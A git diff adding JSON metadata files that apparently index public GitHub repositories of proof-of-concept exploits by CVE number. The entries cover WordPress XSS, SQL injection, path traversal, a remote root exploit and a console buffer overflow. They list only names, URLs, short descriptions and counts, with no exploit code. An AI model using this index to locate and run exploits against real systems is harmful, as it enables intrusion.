100644 index 0000000000..2a3c4d30fe --- /dev/null +++ b/2024/CVE-2024-4439.json @@ -0,0 +1,157 @@ +[ + { + "id": 796592858, + "name": "CVE-2024-4439", + "full_name": "MielPopsssssss\/CVE-2024-4439", + "owner": { + "login": "MielPopsssssss", + "id": 79650146, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79650146?v=4", + "html_url": "https:\/\/github.com\/MielPopsssssss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MielPopsssssss\/CVE-2024-4439", + "description": "CVE-2024-4439 PoC", + "fork": false, + "created_at": "2024-05-06T08:50:23Z", + "updated_at": "2024-09-19T11:29:31Z", + "pushed_at": "2024-05-06T08:50:48Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 796599635, + "name": "CVE-2024-4439", + "full_name": "d0rb\/CVE-2024-4439", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-4439", + "description": "The provided exploit code leverages a stored Cross-Site Scripting (XSS) vulnerability (CVE-2024-4439) in WordPress Core versions up to 6.5.1.", + "fork": false, + "created_at": "2024-05-06T09:07:36Z", + "updated_at": "2024-11-20T23:45:41Z", + "pushed_at": "2024-05-06T09:09:18Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 803543826, + "name": "-CVE-2024-4439", + "full_name": "xssor-dz\/-CVE-2024-4439", + "owner": { + "login": "xssor-dz", + "id": 34897518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34897518?v=4", + "html_url": "https:\/\/github.com\/xssor-dz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xssor-dz\/-CVE-2024-4439", + "description": "WordPress Core < 6.5.2 - Unauthenticated & Authenticated (Contributor+) Stored Cross-Site Scripting via Avatar Block", + "fork": false, + "created_at": "2024-05-20T23:39:54Z", + "updated_at": "2024-05-20T23:44:48Z", + "pushed_at": "2024-05-20T23:44:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 870571270, + "name": "CVE-2024-4439", + "full_name": "soltanali0\/CVE-2024-4439", + "owner": { + "login": "soltanali0", + "id": 87374678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87374678?v=4", + "html_url": "https:\/\/github.com\/soltanali0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soltanali0\/CVE-2024-4439", + "description": "aa", + "fork": false, + "created_at": "2024-10-10T09:30:11Z", + "updated_at": "2024-10-10T09:43:46Z", + "pushed_at": "2024-10-10T09:43:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892084521, + "name": "CVE-2024-4439", + "full_name": "w0r1i0g1ht\/CVE-2024-4439", + "owner": { + "login": "w0r1i0g1ht", + "id": 78846391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78846391?v=4", + "html_url": "https:\/\/github.com\/w0r1i0g1ht", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w0r1i0g1ht\/CVE-2024-4439", + "description": "CVE-2024-4439 docker and poc", + "fork": false, + "created_at": "2024-11-21T13:36:25Z", + "updated_at": "2024-11-21T13:42:38Z", + "pushed_at": "2024-11-21T13:42:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4443.json b/2024/CVE-2024-4443.json new file mode 100644 index 0000000000..11618d64eb --- /dev/null +++ b/2024/CVE-2024-4443.json @@ -0,0 +1,33 @@ +[ + { + "id": 806196076, + "name": "CVE-2024-4443-Poc", + "full_name": "truonghuuphuc\/CVE-2024-4443-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-4443-Poc", + "description": "CVE-2024-4443 Business Directory Plugin – Easy Listing Directories for WordPress <= 6.4.2 - Unauthenticated SQL Injection via listingfields Parameter", + "fork": false, + "created_at": "2024-05-26T16:34:58Z", + "updated_at": "2024-06-26T12:03:29Z", + "pushed_at": "2024-05-26T16:48:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44450.json b/2024/CVE-2024-44450.json new file mode 100644 index 0000000000..0c9b5d6103 --- /dev/null +++ b/2024/CVE-2024-44450.json @@ -0,0 +1,33 @@ +[ + { + "id": 853305470, + "name": "CVE-2024-44450", + "full_name": "VoidSecOrg\/CVE-2024-44450", + "owner": { + "login": "VoidSecOrg", + "id": 141265227, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141265227?v=4", + "html_url": "https:\/\/github.com\/VoidSecOrg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VoidSecOrg\/CVE-2024-44450", + "description": null, + "fork": false, + "created_at": "2024-09-06T11:53:03Z", + "updated_at": "2024-09-06T11:53:40Z", + "pushed_at": "2024-09-06T11:53:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44541.json b/2024/CVE-2024-44541.json new file mode 100644 index 0000000000..ee60395936 --- /dev/null +++ b/2024/CVE-2024-44541.json @@ -0,0 +1,33 @@ +[ + { + "id": 839253700, + "name": "CVE-2024-44541", + "full_name": "pointedsec\/CVE-2024-44541", + "owner": { + "login": "pointedsec", + "id": 113613079, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113613079?v=4", + "html_url": "https:\/\/github.com\/pointedsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pointedsec\/CVE-2024-44541", + "description": "This repository details a SQL Injection vulnerability in Inventio Lite v4's, including exploitation steps and a Python script to automate the attack. It provides information on the vulnerable code, recommended fixes, and how to extract and decrypt administrative credentials.", + "fork": false, + "created_at": "2024-08-07T08:45:43Z", + "updated_at": "2024-09-12T06:46:16Z", + "pushed_at": "2024-09-12T06:46:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44542.json b/2024/CVE-2024-44542.json new file mode 100644 index 0000000000..4561e18d0a --- /dev/null +++ b/2024/CVE-2024-44542.json @@ -0,0 +1,33 @@ +[ + { + "id": 856975237, + "name": "CVE-2024-44542", + "full_name": "alphandbelt\/CVE-2024-44542", + "owner": { + "login": "alphandbelt", + "id": 28209685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28209685?v=4", + "html_url": "https:\/\/github.com\/alphandbelt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alphandbelt\/CVE-2024-44542", + "description": null, + "fork": false, + "created_at": "2024-09-13T15:05:17Z", + "updated_at": "2024-09-13T15:05:40Z", + "pushed_at": "2024-09-13T15:05:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44610.json b/2024/CVE-2024-44610.json new file mode 100644 index 0000000000..e65bcc4807 --- /dev/null +++ b/2024/CVE-2024-44610.json @@ -0,0 +1,33 @@ +[ + { + "id": 832592795, + "name": "PcanExploit", + "full_name": "BertoldVdb\/PcanExploit", + "owner": { + "login": "BertoldVdb", + "id": 6325657, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6325657?v=4", + "html_url": "https:\/\/github.com\/BertoldVdb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BertoldVdb\/PcanExploit", + "description": "CVE-2024-44610: Authenticated remote root exploit in Peak PCAN-Ethernet CAN-(FD) gateways", + "fork": false, + "created_at": "2024-07-23T10:34:19Z", + "updated_at": "2024-10-04T04:03:14Z", + "pushed_at": "2024-09-30T17:08:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44623.json b/2024/CVE-2024-44623.json new file mode 100644 index 0000000000..0f79f6eeba --- /dev/null +++ b/2024/CVE-2024-44623.json @@ -0,0 +1,35 @@ +[ + { + "id": 857035292, + "name": "CVE-2024-44623", + "full_name": "merbinr\/CVE-2024-44623", + "owner": { + "login": "merbinr", + "id": 59112642, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59112642?v=4", + "html_url": "https:\/\/github.com\/merbinr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/merbinr\/CVE-2024-44623", + "description": "Details about the Blind RCE issue(SPX-GC) in SPX-GC", + "fork": false, + "created_at": "2024-09-13T17:11:16Z", + "updated_at": "2024-09-17T06:32:24Z", + "pushed_at": "2024-09-13T18:17:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-44623" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44625.json b/2024/CVE-2024-44625.json new file mode 100644 index 0000000000..7910639da1 --- /dev/null +++ b/2024/CVE-2024-44625.json @@ -0,0 +1,33 @@ +[ + { + "id": 887990161, + "name": "CVE-2024-44625", + "full_name": "Fysac\/CVE-2024-44625", + "owner": { + "login": "Fysac", + "id": 6894940, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6894940?v=4", + "html_url": "https:\/\/github.com\/Fysac", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fysac\/CVE-2024-44625", + "description": "Symbolic link path traversal vulnerability in Gogs", + "fork": false, + "created_at": "2024-11-13T16:16:31Z", + "updated_at": "2024-11-20T16:31:10Z", + "pushed_at": "2024-11-14T02:54:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44812.json b/2024/CVE-2024-44812.json new file mode 100644 index 0000000000..ee206157bf --- /dev/null +++ b/2024/CVE-2024-44812.json @@ -0,0 +1,33 @@ +[ + { + "id": 850367645, + "name": "CVE-2024-44812-PoC", + "full_name": "b1u3st0rm\/CVE-2024-44812-PoC", + "owner": { + "login": "b1u3st0rm", + "id": 47919595, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47919595?v=4", + "html_url": "https:\/\/github.com\/b1u3st0rm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b1u3st0rm\/CVE-2024-44812-PoC", + "description": "Proof of Concept Exploit for CVE-2024-44812 - SQL Injection Authentication Bypass vulnerability in Online Complaint Site v1.0", + "fork": false, + "created_at": "2024-08-31T15:20:27Z", + "updated_at": "2024-09-07T05:54:47Z", + "pushed_at": "2024-09-07T05:54:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44815.json b/2024/CVE-2024-44815.json new file mode 100644 index 0000000000..2b9acd0aef --- /dev/null +++ b/2024/CVE-2024-44815.json @@ -0,0 +1,33 @@ +[ + { + "id": 850270642, + "name": "Extracting-User-credentials-For-Web-portal-and-WiFi-AP-For-Hathway-Router-CVE-2024-44815-", + "full_name": "nitinronge91\/Extracting-User-credentials-For-Web-portal-and-WiFi-AP-For-Hathway-Router-CVE-2024-44815-", + "owner": { + "login": "nitinronge91", + "id": 101330376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101330376?v=4", + "html_url": "https:\/\/github.com\/nitinronge91", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nitinronge91\/Extracting-User-credentials-For-Web-portal-and-WiFi-AP-For-Hathway-Router-CVE-2024-44815-", + "description": "CVE-2024-44815", + "fork": false, + "created_at": "2024-08-31T10:17:11Z", + "updated_at": "2024-09-09T08:04:29Z", + "pushed_at": "2024-09-09T07:54:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44849.json b/2024/CVE-2024-44849.json new file mode 100644 index 0000000000..6a5a3ce4b9 --- /dev/null +++ b/2024/CVE-2024-44849.json @@ -0,0 +1,33 @@ +[ + { + "id": 853571796, + "name": "CVE-2024-44849", + "full_name": "extencil\/CVE-2024-44849", + "owner": { + "login": "extencil", + "id": 132960975, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132960975?v=4", + "html_url": "https:\/\/github.com\/extencil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/extencil\/CVE-2024-44849", + "description": "🔥 CVE-2024-44849 Exploit", + "fork": false, + "created_at": "2024-09-07T00:00:20Z", + "updated_at": "2024-11-11T17:22:24Z", + "pushed_at": "2024-09-11T21:45:23Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44867.json b/2024/CVE-2024-44867.json new file mode 100644 index 0000000000..a2ba6c431d --- /dev/null +++ b/2024/CVE-2024-44867.json @@ -0,0 +1,33 @@ +[ + { + "id": 854920423, + "name": "CVE-2024-44867", + "full_name": "ChengZyin\/CVE-2024-44867", + "owner": { + "login": "ChengZyin", + "id": 117956448, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117956448?v=4", + "html_url": "https:\/\/github.com\/ChengZyin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ChengZyin\/CVE-2024-44867", + "description": null, + "fork": false, + "created_at": "2024-09-10T01:49:36Z", + "updated_at": "2024-09-20T07:08:40Z", + "pushed_at": "2024-09-10T03:51:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44902.json b/2024/CVE-2024-44902.json new file mode 100644 index 0000000000..b79b58a233 --- /dev/null +++ b/2024/CVE-2024-44902.json @@ -0,0 +1,33 @@ +[ + { + "id": 852875618, + "name": "CVE-2024-44902", + "full_name": "fru1ts\/CVE-2024-44902", + "owner": { + "login": "fru1ts", + "id": 108859681, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108859681?v=4", + "html_url": "https:\/\/github.com\/fru1ts", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fru1ts\/CVE-2024-44902", + "description": null, + "fork": false, + "created_at": "2024-09-05T15:22:22Z", + "updated_at": "2024-11-10T10:53:38Z", + "pushed_at": "2024-09-07T02:15:05Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44946.json b/2024/CVE-2024-44946.json new file mode 100644 index 0000000000..d439529324 --- /dev/null +++ b/2024/CVE-2024-44946.json @@ -0,0 +1,33 @@ +[ + { + "id": 850684151, + "name": "CVE-2024-44946", + "full_name": "Abdurahmon3236\/CVE-2024-44946", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-44946", + "description": null, + "fork": false, + "created_at": "2024-09-01T13:45:12Z", + "updated_at": "2024-09-02T00:39:50Z", + "pushed_at": "2024-09-01T13:48:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-44947.json b/2024/CVE-2024-44947.json new file mode 100644 index 0000000000..740318a385 --- /dev/null +++ b/2024/CVE-2024-44947.json @@ -0,0 +1,33 @@ +[ + { + "id": 851814021, + "name": "CVE-2024-44947", + "full_name": "Abdurahmon3236\/CVE-2024-44947", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-44947", + "description": null, + "fork": false, + "created_at": "2024-09-03T18:37:40Z", + "updated_at": "2024-09-03T18:39:14Z", + "pushed_at": "2024-09-03T18:39:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45058.json b/2024/CVE-2024-45058.json new file mode 100644 index 0000000000..10efd9bfb9 --- /dev/null +++ b/2024/CVE-2024-45058.json @@ -0,0 +1,33 @@ +[ + { + "id": 850037289, + "name": "CVE-2024-45058", + "full_name": "0xbhsu\/CVE-2024-45058", + "owner": { + "login": "0xbhsu", + "id": 152667761, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152667761?v=4", + "html_url": "https:\/\/github.com\/0xbhsu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xbhsu\/CVE-2024-45058", + "description": "PoC for CVE-2024-45058 Broken Access Control, allowing any user with view permission in the user configuration section to become an administrator changing their own user type.", + "fork": false, + "created_at": "2024-08-30T18:44:05Z", + "updated_at": "2024-09-08T20:02:26Z", + "pushed_at": "2024-09-08T20:01:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45200.json b/2024/CVE-2024-45200.json new file mode 100644 index 0000000000..a39909abae --- /dev/null +++ b/2024/CVE-2024-45200.json @@ -0,0 +1,39 @@ +[ + { + "id": 856653771, + "name": "kartlanpwn", + "full_name": "latte-soft\/kartlanpwn", + "owner": { + "login": "latte-soft", + "id": 87558718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87558718?v=4", + "html_url": "https:\/\/github.com\/latte-soft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/latte-soft\/kartlanpwn", + "description": "Information & PoC for CVE-2024-45200, Mario Kart 8 Deluxe's \"KartLANPwn\" buffer overflow vulnerability", + "fork": false, + "created_at": "2024-09-13T00:41:32Z", + "updated_at": "2024-11-01T20:09:06Z", + "pushed_at": "2024-10-01T00:57:03Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "buffer-overflow", + "cve", + "cve-2024-45200", + "mk8dx", + "nintendo-switch" + ], + "visibility": "public", + "forks": 1, + "watchers": 52, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45241.json b/2024/CVE-2024-45241.json new file mode 100644 index 0000000000..5670e2e2a0 --- /dev/null +++ b/2024/CVE-2024-45241.json @@ -0,0 +1,71 @@ +[ + { + "id": 847361376, + "name": "CVE-2024-45241", + "full_name": "d4lyw\/CVE-2024-45241", + "owner": { + "login": "d4lyw", + "id": 53091736, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53091736?v=4", + "html_url": "https:\/\/github.com\/d4lyw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d4lyw\/CVE-2024-45241", + "description": "Path Traversal in CentralSquare's CryWolf", + "fork": false, + "created_at": "2024-08-25T15:57:40Z", + "updated_at": "2024-09-18T22:48:09Z", + "pushed_at": "2024-08-25T16:09:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 859878308, + "name": "CVE-2024-45241", + "full_name": "verylazytech\/CVE-2024-45241", + "owner": { + "login": "verylazytech", + "id": 172168670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4", + "html_url": "https:\/\/github.com\/verylazytech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-45241", + "description": null, + "fork": false, + "created_at": "2024-09-19T12:43:48Z", + "updated_at": "2024-11-26T21:34:47Z", + "pushed_at": "2024-11-26T14:47:16Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "centeralsquare", + "crywolf", + "cve-2024-45241", + "exploit", + "path-traversal", + "poc" + ], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45244.json b/2024/CVE-2024-45244.json new file mode 100644 index 0000000000..df1618818d --- /dev/null +++ b/2024/CVE-2024-45244.json @@ -0,0 +1,100 @@ +[ + { + "id": 819022278, + "name": "HLF_TxTime_spoofing", + "full_name": "shanker-sec\/HLF_TxTime_spoofing", + "owner": { + "login": "shanker-sec", + "id": 88376669, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88376669?v=4", + "html_url": "https:\/\/github.com\/shanker-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shanker-sec\/HLF_TxTime_spoofing", + "description": "PoC covering the problem of transaction time manipulation (CVE-2024-45244) in the Hyperledger Fabric blockchain.", + "fork": false, + "created_at": "2024-06-23T14:56:14Z", + "updated_at": "2024-08-27T10:04:52Z", + "pushed_at": "2024-08-14T07:48:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blockchain", + "chaincode", + "chaincode-go", + "cve-2024-45244", + "digital-finance", + "exploit", + "golang", + "hacking", + "hlf", + "hyperledger", + "hyperledger-fabric", + "proof-of-concept", + "smart-contracts", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834943647, + "name": "hlf-time-oracle", + "full_name": "shanker-sec\/hlf-time-oracle", + "owner": { + "login": "shanker-sec", + "id": 88376669, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88376669?v=4", + "html_url": "https:\/\/github.com\/shanker-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shanker-sec\/hlf-time-oracle", + "description": "Chaincode for blockchain Hyperledger Fabric provides accurate time to other chaincodes. Thus solving the security problem associated with transaction time manipulation (CVE-2024-45244).", + "fork": false, + "created_at": "2024-07-28T19:19:42Z", + "updated_at": "2024-08-28T15:23:39Z", + "pushed_at": "2024-08-28T15:23:35Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blockchain", + "blockchain-security", + "blockchain-tool", + "chaincode", + "chaincode-go", + "cve-2024-45244", + "defensive-security", + "distributed-ledger-technology", + "golang", + "hlf", + "hyperledger", + "hyperledger-fabric", + "mitm", + "ntp-client", + "ntp-protocol", + "nts-client", + "nts-protocol", + "security-tools", + "smart-contract-security", + "smart-contracts" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45264.json b/2024/CVE-2024-45264.json new file mode 100644 index 0000000000..661b3c8b4b --- /dev/null +++ b/2024/CVE-2024-45264.json @@ -0,0 +1,33 @@ +[ + { + "id": 847669530, + "name": "CVE-2024-45264", + "full_name": "TheHermione\/CVE-2024-45264", + "owner": { + "login": "TheHermione", + "id": 73027590, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73027590?v=4", + "html_url": "https:\/\/github.com\/TheHermione", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheHermione\/CVE-2024-45264", + "description": " CVE-2024-45264", + "fork": false, + "created_at": "2024-08-26T10:10:52Z", + "updated_at": "2024-08-26T11:03:27Z", + "pushed_at": "2024-08-26T10:56:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45265.json b/2024/CVE-2024-45265.json new file mode 100644 index 0000000000..9b20c6b188 --- /dev/null +++ b/2024/CVE-2024-45265.json @@ -0,0 +1,33 @@ +[ + { + "id": 847689277, + "name": "CVE-2024-45265", + "full_name": "TheHermione\/CVE-2024-45265", + "owner": { + "login": "TheHermione", + "id": 73027590, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73027590?v=4", + "html_url": "https:\/\/github.com\/TheHermione", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheHermione\/CVE-2024-45265", + "description": "CVE-2024-45265", + "fork": false, + "created_at": "2024-08-26T11:02:37Z", + "updated_at": "2024-08-26T11:05:59Z", + "pushed_at": "2024-08-26T11:05:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45383.json b/2024/CVE-2024-45383.json new file mode 100644 index 0000000000..2de7d038ff --- /dev/null +++ b/2024/CVE-2024-45383.json @@ -0,0 +1,33 @@ +[ + { + "id": 859399058, + "name": "CVE-2024-45383", + "full_name": "SpiralBL0CK\/CVE-2024-45383", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2024-45383", + "description": " poc for CVE-2024-45383", + "fork": false, + "created_at": "2024-09-18T15:40:19Z", + "updated_at": "2024-09-30T15:20:42Z", + "pushed_at": "2024-09-18T15:40:37Z", + "stargazers_count": 3, + "watchers_count": 